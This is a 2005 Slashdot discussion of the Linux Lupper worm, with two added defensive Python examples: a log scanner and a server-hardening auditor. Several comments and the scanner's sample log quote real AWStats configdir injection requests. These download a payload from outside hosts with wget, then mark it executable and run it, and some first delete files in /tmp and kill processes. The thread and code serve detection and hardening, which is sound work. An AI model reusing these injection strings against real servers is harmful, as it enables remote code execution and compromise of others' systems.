Linux Lupper.Worm In the Wild
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be cross-platform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
Next is a collection of messages saying that it is the fault of the system administrators and not a problem with the Linux distributions.
p.s. BURN KARMA BURN!
Ubuntu is an African word meaning 'I can't configure Debian'
Second, how do you remove it? Quoth the page:
Seems kind of wrong to name it exclusively a linux problem.
Oh, well we've got this PHP worm... Why don't we call it a Linux worm and the press will just eat it up!
...then it's a PHP/*nix worm, not Linux specifically.
Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.
...Linux is more and more popular with corporations holding valuable and important data.
;)
Success is a double-edged sword.
All sysadmins who are still running this insecure setup are advised to patch your systems immediately. Yes, all fourteen of you.
According to http://searchsecurity.techtarget.com/qna/0,289202,sid14_gci955041,00.html, this worm started in 2002... or am I mistaken?
"If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?
Paraphrased from the virus description;
IF you run a specific kernel version with some special module
AND you run one of a couple specific versions of one package not installed by default
AND you have a very "generic" config on that package
AND you have some plugins enabled, but not configured for security
AND you are on a world routable IP address
AND you have some specific vulnerable scripts,
THEN you might need to take a look at if you are at risk.
Paraphrased from the virus description of most MSFT worms:
IF you run an MSFT operating system
AND you haven't reformatted your HDD in the last hour
THEN it's time to pucker up and kiss the sucker goodbye..
-GenTimJS
If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment ...
which in practice means that your admin died a couple of years ago but was never replaced.
May Peace Prevail On Earth
So here is some, shamelessly cribbed from eWeek. The worm actually attempts to attack three different web services:
"The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.
AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.
Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "
This still does not tell me which blogging/wiki programs are affected, only that "most" have fixes - more info, anyone?
Using plain ol' text since 1968
I just noticed this today, and from what I've heard here it sounds a likely candidate. IP addresses obscured for politeness.
193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
...
193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
...
For 60 hits.
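The log lines above are the whole signal an admin has for this worm, so here is an added example (written for this page, not code from the thread, McAfee or Symantec) that pulls the injected shell command and its download URLs out of AWStats configdir requests and flags xmlrpc.php POST probes in Apache combined logs. The sample lines are constructed, modelled on the ones posted; the addresses and hostnames in them are documentation placeholders, not observed infrastructure.

```python
"""Added example (not code from the thread, McAfee or Symantec): pull the
injected shell command and its download URLs out of Lupper-style AWStats
'configdir' requests and flag xmlrpc.php POST probes in Apache combined logs."""
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample, modelled on the lines posted in the thread. Addresses
# and hostnames are placeholder values, not observed infrastructure.
SAMPLE_LOG = """\
192.0.2.10 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198.51.100.7%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%20198.51.100.7;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.0.2.10 - - [04/Nov/2005:15:10:31 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.0.2.11 - - [06/Nov/2005:18:13:39 -0500] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20example.invalid/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 1030 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
192.0.2.12 - - [04/Nov/2005:15:12:00 -0700] "GET /awstats/awstats.pl?config=www.example.org HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [ts] "METHOD target PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Fetch commands and their first non-option argument; ';', '|' and '&' end a word.
FETCH_RE = re.compile(r"\b(?:wget|curl|lwp-download|fetch)\s+(?:-[^\s;|&]+\s+)*([^\s;|&]+)")


def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def injected_command(target: str) -> Optional[str]:
    """Shell command smuggled through ?configdir=, or None.

    Perl's two-argument open() runs the 'file name' as a shell command when it
    starts or ends with '|', which is what the configdir injection abuses.
    The query is split by hand so literal ';' in the payload survives."""
    query = target.partition("?")[2]
    for param in query.split("&"):
        name, sep, raw = param.partition("=")
        if name != "configdir" or not sep:
            continue
        value = unquote(raw)
        if value.startswith("|") or value.endswith("|"):
            return value.strip("|").strip("; ")
    return None


def download_urls(command: str) -> list:
    """URLs the injected command would fetch (the second-stage payload)."""
    return FETCH_RE.findall(command)


def classify(entry: dict) -> Optional[dict]:
    """Return a finding for one parsed entry, or None if it looks benign."""
    path = entry["target"].partition("?")[0]
    cmd = injected_command(entry["target"])
    if cmd is not None:
        return {
            "kind": "awstats_configdir_injection",
            "ip": entry["ip"],
            "command": cmd,
            "fetches": download_urls(cmd),
            # 404/401 means no script answered; only a 200 warrants looking for
            # /tmp/lupii and stray processes on the host.
            "reached_script": entry["status"] == "200",
        }
    if entry["method"] == "POST" and path.endswith("/xmlrpc.php"):
        return {"kind": "xmlrpc_probe", "ip": entry["ip"], "path": path,
                "reached_script": entry["status"] == "200"}
    return None


def scan(log_text: str) -> list:
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line) if line.strip() else None
        finding = classify(entry) if entry else None
        if finding is not None:
            findings.append(finding)
    return findings


def iocs(findings: list) -> list:
    """Distinct download sources: what to block at the firewall and report."""
    return sorted({url for f in findings for url in f.get("fetches", [])})


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
    print("IOCs:", iocs(scan(SAMPLE_LOG)))
```

The 404 and 401 responses in the posted logs mean the request never reached a live awstats.pl, so those hosts were probed, not infected; a 200 on a configdir=| request is the line to chase with a look in /tmp. The IOC list is the set of hosts the poster below wanted someone to shut down.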
Linux has a huge market share in the server market, idiot.
I doubt I'll have the libraries required to run this worm.
http://vil.nai.com/vil/RateThisPage.asp
Let McAfee know how well they're trolling.
The road between democracy and tyranny is paved with secrecy in the name of security.
McAfee sucks for real info; look at Symantec or at my summary. In short: update your software on time. There are some small inconsistencies between what the worm attacks and what needs to be updated though.
My wife's sketchblog Blob[p]: Gastrono-me
Symantec has a more complete description page at http://securityresponse.symantec.com/avcenter/venc/data/linux.plupii.html
including links to XML-RPC PHP1.x library vulnerabilities used by this malware.
This worm is also known as Linux.Plupii and Linux/Lupper.A too.
Internet Storm Center has a lot of technical information at their
http://isc.sans.org/diary.php?storyid=823
Security Focus eWeek CNet
One line blog. I hear that they're called Twitters now.
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
In the distros I've used, the user has to explicitly choose to have a web server installed. Even after that, the user's probably going to have to explicitly choose to install PHP.
"...today consumers have been conditioned to think of beer when they see a bullfrog..."
Currently, this worm is only compatible with Linux/BSD systems, because they are the only systems with full shell scripting capabilities.
It is rumored that you can obtain the same level of compatibility with the Cygwin Suite, but that is not an officially supported configuration by Microsoft.
Never fear, though, Monad will bring Lupper, and similar PHP/Shell script worms to the Windows platform for the masses!
Seriously, though; isn't everyone fairly aware that PHP ain't that secure?
WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
Except that in order to be attacked, you must have AWStats or WebHints installed. i.e. This isn't corporate software being attacked. It's technologists and power-users who run their own websites.
Javascript + Nintendo DSi = DSiCade
a decent description can be found here http://isc.sans.org/diary.php?storyid=823
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
As far as I can tell, a default Linux distro isn't vulnerable until you install a vulnerable PHP or CGI script. I don't think many Linux systems ship in this configuration. The reason why this worm exists is the wide deployment of Linux http servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.
According to McAfee it's: It is a modified derivative of the Linux/Slapper ...
And according to a 2002 CERT advisory the Slapper worm appears to work only on Linux systems running Apache with the OpenSSL module (mod_ssl) on Intel architecture.
Surprisingly there seems to be no mention of it at apache.org, which leads me to think it's pretty benign and not widespread. I could be wrong.
That's Gnu/Linux worm to you, you insensitive clod!
If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.
1. Don't permit external shell access through your www accounts. Make all your www accounts' shell /usr/bin/false. I realize that some people need CLI access, but it should be severely limited in its functions and only used by those who have a real need.
2. Don't permit PHP/CGI scripts that are exploitable. Okay, that is a broad general statement; however, there are well-known malicious scripts and well-known exploitable scripts. Don't allow them. And certainly don't allow them if CLI access is being used.
3. do apply your security patches (after testing).
4. Host with a good website company like 34sp.com (shameless plug with who I am hosted on)
if this worm does not include the sourcecode with every computer it infects it is violating the terms and conditions of the GNU/GPL
Politics is Treachery, Religion is Brainwashing
Here are some simple things you can do to harden your server. Note that they are not a substitute for actually fixing or removing broken scripts, but they can buy you time.
Linux ships with a webserver running by default? Last I checked there was no webserver in the kernel. Everything else is up to the distributor.
From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.
Apache usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in /tmp.
Unless I misunderstand the article and comments, it seems that
Safety of Linux user who screws up >> MS user who does everything right
Now I have something to do with this O.S. that I don't seem able to kill with normal usage.
Which packages do I have to install? I'm feeling nostalgic for Windows.
/. bug #926803 - Why I can post.
sounds to me like an apache with php problem.
I don't see how that would make it a linux worm. Does this "worm" also work on Solaris, HPUX, AIX, and other apache and php aware operating systems?
sounds to me like a new version of the old formmail.pl problem.
Why read the article when I can just make up a snap judgement?
Set up a cron to run at 1 minute intervals to rm -rf /tmp/lupii
Quite simple really.
Content Management System: A pretentious way of saying "text editor."
True, very true. Unfortunately, AWStats is extremely popular on personal and small business web servers. Its presence is extremely probable as it's a free and feature complete log analyzer. :-(
I really do wonder if the script can infect an OS X machine running AWStats? Many posters seem to think the answer is 'No'. Sadly, the article is shy on details, but I think the answer may be 'Yes'. Which could make this the first available Mac OS X Virus.
What's really interesting, however, is the fact that the worm is very similar to the Slapper worm. The only difference is that it exploits common PHP/CGI software rather than Apache itself. A coincidence, or a new revision of the same virus?
Javascript + Nintendo DSi = DSiCade
Although the kernel webserver was removed in 2.6, there are a lot of people still running 2.4, which includes a webserver in the kernel.
No one enables it though, I'm just being a smartass.
Nihil Illegitemi Carborvndvm
Even more sad, the AV companies couldn't even detect that this was 95% Slapper code! C'mon, the kiddie who released this didn't even strip the debug symbols much less pack it in any way.
With that said, my writeup of the worm is here:
http://www.lurhq.com/slapperv2.html
Includes some previously unreleased facts about who wrote most of the code recycled in Slapper and in Lupper.
If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and execute
It's quite obvious that this is real security malpractice. Even if someone allows external shell commands from the web server, they usually limit access to these kinds of resources.
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
AFAIK, most distros let you choose which services will be installed, so it's really up to the user.
The Linux webserver would not be vulnerable anyway, since it does not support PHP.
All signs point to Linux having anywhere from the same market share as Macs up to 3 times the market share of Macs, particularly if you take into account webservers, which would not show up in places like traditional webstats because web servers don't browse web sites; same thing for HPCs. Also, most Linux machines are converted Wintel boxes, meaning that as far as sales stats go, Windows makes out really well. Take into account that a lot of Linux boxes are old as well as new, meaning that a lot of people who run Linux often run more than one Linux box, some of which may be a decade or so old (or much older in some cases). The average Wintel box is replaced every 2~3 years. That means, for the sake of argument, if I set up a Linux box today and a Windows box, in 6 years after the first Wintel box is replaced, Microsoft will have 2 "points" and Linux will have 1 even though there is still 1 Linux box and 1 Wintel box running. Now if that Linux box originally was a Windows box, as it is in most cases, then Microsoft would have 3 "points" and Linux none.
Apple often uses sales figures to make their market share appear larger than it is; those numbers are not accurate and highly biased against Linux. But as far as your little rant goes, this is an exploit in php and only php. But it is even more specific than that: you must have a very specific configuration which pretty much allows anyone to own your machine. This worm doesn't use an exploit, it uses the stupidity of people who configure machines for convenience rather than security. It's akin to leaving the door to my house not only unlocked, but wide open because I didn't feel like being inconvenienced by opening it every day. I've never heard of a box being configured the way the article describes, so this is indeed a rare occurrence.
But just in case you forgot, Mac OS X does have its problems, despite the limited amount of software that comes with it and the limited liability that Apple takes. Apple's track record is on par with any Linux distro, for instance Debian or Fedora, but this actually means that Apple's record is worse because in a distro like Debian or Fedora, these projects take responsibility for something like 10,000 packages. If you look at Fedora's page in Secunia you'll see that its advisories include updates for Mozilla, Squid, Wget, AbiWord and every other package. Considering that one project has the burden of having to report and patch so many packages, you would expect the number to be much higher. Looks like Linux is still kicking both Microsoft's and Apple's ass as far as security goes.
Regards,
Steve
because BSD is confirmed dead.'
Rich And Stupid is not so bad as Working For Rich And Stupid.
The reason why this worm exist is due to the wide deployment of Linux http servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.
What about:
The reason why this worm exist is due to the wide deployment of Windows Desktops with this specific vulnerability. There just aren't many Linux Desktops out there to bother with them.
Sure, it lacks the first sentence. But the hive-mind here does not like that argument.
...as a new distro sounds catchy, doesn't it?
one more thing: according to the not-very-fine article, the exploit requires one of the following ports listening: UDP 7111, UDP 7222.
So, once again, a firewall that blocks EVERYTHING, EXCEPT things you want open (like 80 and 22) will prevent this, right? Seems to me that slapper (which affected Apache with mod_ssl and 443 open, IIRC) was much more dangerous.
Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
I checked my logs and found the following:
[06/Nov/2005:18:13:39 -0500] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1030 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Why not get somebody to shut down members.lycos.co.uk/sugi/a.txt??
"according to MS" -> "According to MS when he's interested in not being accused of being a monopoly".
Microsoft could change their software to enable/disable the IE-dependent functions when IE is installed/uninstalled. Some apps use the IE COM thingy (desktop background, HTML help, explorer.exe's web view, media player), which is good, but that doesn't mean it can't be removed (furthermore, IE design is ugly; someone can explain why they don't have a common "image format" COM/OLE/whatever object that desktop background can use instead of using IE as a "kitchen sink").
When Microsoft says "tightly integrate", it means "OMG! If we remove IE people won't be able to use a jpg as background and won't be able to read chm help!", but it doesn't mean it can't be removed if they wanted, as if they couldn't move the .chm help to another format. Of course, since lawyers know nothing about computers and money in America's justice system matters so much, it has not been hard for Microsoft to convince lawyers that IE can't be separated from Windows.
Well, firstly, I doubt this worm will be particularly widespread - the vast majority of sites use name-based virtual hosting, and this worm just uses the IP address. Obviously some systems (with the very outdated versions of the vulnerable programs) will be vulnerable. But this isn't really the point of what I'm thinking about.
The point is that if you run a server (of any OS) you can take preventative measures to stop the propagation of hacks/malware/trojans, even if you have users who install buggy PHP scripts. Some straightforward preventative measures are:
1. Ensure that the 'wget' (and any other similar utilities) command is NOT available to the user which cgi/php scripts are run as. Many hackers use an initial exploit to get into the machine, then wget the script or program they really want to run (such as the good old bindshell)
2. Mount /tmp (and anything else writeable by the script) no-exec (although there are ways around this, it will defeat many skript kiddies).
3. Implement rate limiting on the MTA that runs on the machine. Have the MTA shut down altogether if the mail queue is gigantic. This way, if someone does get in, and tries to spam with your machine, it won't get very far. It will also give you time to investigate the problem.
4. Use iptables! Only open ports that should be open. Also, use *egress* filtering too. If your server should not be contacting anything on port 80, say, except the Debian distro servers for apt, use iptables to stop outbound access to anything except those servers. Prevent all outbound access except where strictly needed.
5. Treat every local root exploit as if it was a remote root exploit. If you run a web server, there is *no such thing* as a local root exploit. All it takes is a buggy PHP script, and an attacker can try and elevate their privileges through the local root exploit.
Those 4 things will keep you safe against most of these cookie-cutter or skript kiddie attacks. But to go further:
6. Use SElinux to only allow Apache to access what it should access and nothing else. Particularly executables. Therefore, if someone manages to successfully wget their exploit script after exploiting the buggy PHP script, they can't actually run it because SElinux will prevent it from being run.
7. Use Xen to divide your server up. Put the web server (the most complex and most likely to be exploited) in a separate Xen-U instance to everything else. Then you can make sure that the only stuff installed on the instance is stuff strictly needed to run the web sites. You can also do much more aggressive filtering with iptables - so for instance, if you put the MTA on another Xen-U, plus all the other services you need (DNS etc.) you can make it so the web server needs to have no egress *at all* except via the services on the other Xen-U. This makes it essentially impossible for someone to use an exploit to download and run another script on your web server - they can't even change the port number of their webserver (say, to 25) to allow them to get the file they need.
I have had two serious attempts (i.e. NOT skript kiddies - the most recent one was a Romanian phishing group) to hack my (multi-user, shared hosting) web server in the last couple of years. They were both defeated by at least one of these techniques, and I learned from each. My web server is now divided into multiple Xen instances, and the HTTP server part has very strict egress rules.
Oolite: Elite-like game. For Mac, Linux and Windows
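Two of the measures in the list above (noexec on script-writable directories, default-deny egress) are easy to state and easy to lose in a later change, so here is an added example, written for this page and not the poster's own tooling, that audits a host for them. It works on the text of /proc/mounts and of iptables-save rather than touching the live system; the inputs below are constructed, with placeholder mount points and a placeholder allow-listed address, and the "hardened" pair shows what the same box looks like after the advice is applied.

```python
"""Added example, not code from the thread: audit two of the posted measures
(noexec on script-writable dirs, default-deny egress) against constructed
/proc/mounts and iptables-save text. Addresses and mounts are placeholders."""
import shlex

# Constructed "weak" inputs: /tmp and /var/www mounted exec, OUTPUT chain wide open.
MOUNTS_WEAK = """\
/dev/sda1 / ext3 rw,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
/dev/sdb1 /var/www ext3 rw 0 0
"""
IPTABLES_WEAK = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p tcp --dport 80 -j ACCEPT
-A INPUT -p tcp --dport 22 -j ACCEPT
COMMIT
"""
# Constructed "hardened" inputs: same box after applying the advice above
# (198.51.100.5 stands in for the distro's package mirror).
MOUNTS_HARDENED = """\
/dev/sda1 / ext3 rw,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0
/dev/sdb1 /var/www ext3 rw,nodev,noexec 0 0
"""
IPTABLES_HARDENED = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p tcp --dport 80 -j ACCEPT
-A INPUT -p tcp --dport 22 -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A OUTPUT -d 198.51.100.5/32 -p tcp --dport 80 -j ACCEPT
COMMIT
"""

# Directories the web server's user can normally write to (assumed layout).
SCRIPT_WRITABLE = ("/tmp", "/var/www")


def mount_options(mounts_text, mountpoint):
    """Option set for a mount point, or None if it is not a separate mount."""
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == mountpoint:
            return set(fields[3].split(","))
    return None


def check_noexec(mounts_text, dirs=SCRIPT_WRITABLE):
    findings = []
    for d in dirs:
        opts = mount_options(mounts_text, d)
        if opts is None:
            findings.append(f"{d}: not a separate mount, so it cannot carry noexec on its own")
        elif "noexec" not in opts:
            findings.append(f"{d}: mounted without noexec (a downloaded binary can run from here)")
    return findings


def _allows_new_egress(args):
    """True for an OUTPUT ACCEPT rule not pinned to a destination, loopback,
    or an already-established connection, i.e. one a wget could use."""
    if "-j" not in args or "ACCEPT" not in args:
        return False
    if "-d" in args or "--destination" in args:
        return False
    if "-o" in args and args[args.index("-o") + 1] == "lo":
        return False
    if "--state" in args and "ESTABLISHED" in args[args.index("--state") + 1]:
        return False
    return True


def check_egress(save_text):
    findings = []
    for line in save_text.splitlines():
        if line.startswith(":OUTPUT "):
            policy = line.split()[1]
            if policy != "DROP":
                findings.append(f"OUTPUT default policy is {policy}: a compromised CGI can fetch its payload from anywhere")
        elif line.startswith("-A OUTPUT ") and _allows_new_egress(shlex.split(line)):
            findings.append(f"unrestricted egress rule: {line}")
    return findings


def audit(mounts_text, save_text):
    """All findings for one host; an empty list means both measures are in place."""
    return check_noexec(mounts_text) + check_egress(save_text)


if __name__ == "__main__":
    for label, m, r in (("weak", MOUNTS_WEAK, IPTABLES_WEAK),
                        ("hardened", MOUNTS_HARDENED, IPTABLES_HARDENED)):
        print(label, audit(m, r) or "OK")
```

On a real box feed it `open("/proc/mounts").read()` and the output of `iptables-save`. Note the caveat the poster makes himself: noexec stops the `wget lupii; chmod +x lupii; ./lupii` chain, but not `wget a.txt; perl a.txt`, which is exactly what the other logged probe on this page does, so the egress rule is the one that covers both.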
It's not quite lunch, it's not quite supper; let's call it lupper!
All signs point to linux having anywhere from the same market share as macs up to 3 times the market share of macs, particularly if you take into account webservers which would not show up in places like traditional webstats because web servers don't browse web sites, same thing for HPCs.
:-)
But you'd need to do the same for Macs. Not that I'm saying that Apple is selling more X-Serve Units than Linux installs out there, but the figures for Macs won't show up in the same way that the Linux figures don't show up. It's especially important not to discount Macs as the WebObjects platform is very popular.
Take into account that a lot of Linux boxes are old as well as new, meaning that a lot of people who run Linux often run more than one Linux box, some of which may be a decade or so old (or much older in some cases). The average Wintel box is replaced every 2~3 years. That means, for the sake of argument, if I set up a Linux box today and a Windows box, in 6 years after the first Wintel box is replaced, Microsoft will have 2 "points" and Linux will have 1 even though there is still 1 Linux box and 1 Wintel box running.
I don't really buy this argument. Most Linux users I've seen reinstall their system for every major update, which tends to come more often than Windows. This is something of a requirement as software support isn't as long-lasting on Linux as it is on Windows. i.e. Many developers make a conscious effort to support machines going all the way back to Win98. Linux developers OTOH tend to target the latest GLIBC, thus requiring that the user churn through new installations at a fairly good clip. BSD machines seem to have a bit longer lifespan, but they also suffer from upgrade-or-die-itis. In the case of FreeBSD, however, the system is designed to be easily upgraded via a system recompile. (Which amazingly tends not to break things.)
But as far as your little rant goes, this is an exploit in php and only php.
Incorrect. It's an exploit against the AWStats CGI script and the PHP XML-RPC APIs. Apparently it can also exploit WebHints. (Whatever that is.)
But it is even more specific than that: you must have a very specific configuration which pretty much allows anyone to own your machine.
It is a very common configuration. Hundreds of inexpensive web hosts offer AWStats, and many personal web servers run it to track traffic. There are a LOT of people who are vulnerable to this exploit. Especially since people think of AWStats as being something hidden that only they can see. Why would they upgrade?
But just in case you forgot, Mac OSX does have its problems, despite the limited amount of software that comes with them and the limited liability that Apple takes.
What's interesting though is the exploits themselves. Security experts have to really work to find an exploit, and most of the ones they find are impossible to actually exploit under any normal circumstances. e.g. If you check the link you provided, you'll notice how many say "local exploit" on them. As in, you need direct access to the machine before it can be exploited. Under Windows, already having access to the machine is the end of the world unless the user has explicitly locked things down. Under Linux, it depends on the quality of the security configuration. A smart admin would be using SUDO and time-lock screensavers. Not all systems are configured this way, however.
Apple's track record is on par with any linux distro, for instance Debian or Fedora, but this actually means that Apple's record is worse because in a distro like Debian or Fedora, these projects take responsibility for something like 10,000 packages.
That's a non-argument. Macs do everything the users want them to do and yet remain secure. That's the key point. Sometimes less is more.
Thank you for the well reasoned argument.
Javascript + Nintendo DSi = DSiCade
Linux has a smaller market share than Mac OS X, yet it's still getting targeted by virus writers?
... just so you don't need to feel left out.
But really, this article is just more anti-virus vendor FUD. Seems they're trolling non-Windows users on a weekly basis (maybe they enjoy Troll Tuesday?) because they know that their time is almost up:
- People switching to a Mac won't need their products
- People running Linux won't need their products
- The 800-lb - oops - 1600-lb gorilla in the Windows marketspace - Microsoft - is coming out with their own antivirus
If you were in their situation, what would you do?
So wait, you are saying that the worm brings Linux and BSD systems into existence? That is amazing, and quite cool if you ask me!
Ohhhh, you meant "affect", not "effect". Someone attempting to be pedantic should choose their words carefully.
My beliefs do not require that you agree with them.
If you are a sysadmin that knows what you are doing, this worm would not effect you.
Let's look at this logically.
If the Linux distribution does not run Apache by default, it is safe.
If Windows does not run IIS by default, it is safe.
So far, so good.
If the Linux distribution does not run PHP by default, it is safe.
If Windows does not run their scripting system by default, it is safe.
So far, so good.
If the Linux distribution does not run those particular scripts by default, it is safe.
If Windows does not run vulnerable scripts by default, it is safe.
So far, so good.
So, both Linux/Apache/PHP/scripts and Windows/IIS/scripting/scripts are as secure as each other in this particular instance.
Both can be made vulnerable by installing systems/scripts that are not part of the default system.
But most of the Windows compromises have not been from installing 3rd party vulnerable scripts. Historically, the compromises have come from system vulnerabilities that the admins have not patched, even when the patches are available.
The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.
Just because this one type would require the same actions on both systems does not mean that this type can be generalized to all exploits of both systems.
Um, AWStats isn't written in PHP, but in Perl. This isn't a PHP worm, it's a CGI exploit which happens to target PHP apps, plus the occasional Perl app.
Need a Linux consultant in New Orleans?
I just grep'd through my logs and found someone trying (perhaps beta-testing?) this exploit back in June 2005:
xx.xxx.xx.xx - - [18/Jun/2005:05:51:35 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.suxehacker.home.ro/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;echo%20;echo| HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Anyone know how to make /tmp noexec on OS X?
Hopefully from now on all worms and viruses will be named according to the OS they affect. I'm tired of hearing Windows worms/viruses referred to as if they were affecting all computers everywhere.
if member of {Windows, Sysadmin} then not exist
This is not a flaw in Linux. It is a vulnerability in a script written in PHP that a sysadmin may install on a Linux box.
This has nothing to do with whether "valuable and important data" is stored on a Linux box.
If Linux was used by 10x more people/systems, there is no reason to believe that we'd see 10x more worms/viruses in the wild.
Yet every time the topic of a Linux worm/virus/trojan comes up, someone will make a comment about how it will only happen more as Linux becomes more popular.
the threat level is low to very low depending on reporting site and their need for money.
I prefer the "u" in honour as it seems to be missing these days.
So if you have a Windows, Solaris, OS-X, etc PHP system that has a problematic script, it could probably exploit and get in, but when it tried to run there'd be an error, since the OS wouldn't recognise the executable format. Other OSes that can do Linux binaries like FreeBSD could be potentially infected, but that's probably it. Also probably only works on x86 Linux, not PPC.
I'd try to sell a network/email scanning/monitoring package, myself, for the 'enterprise' environment. Company-wide antivirus for the network.
The World Wide Web is dying. Soon, we shall have only the Internet.
There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.
The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home.
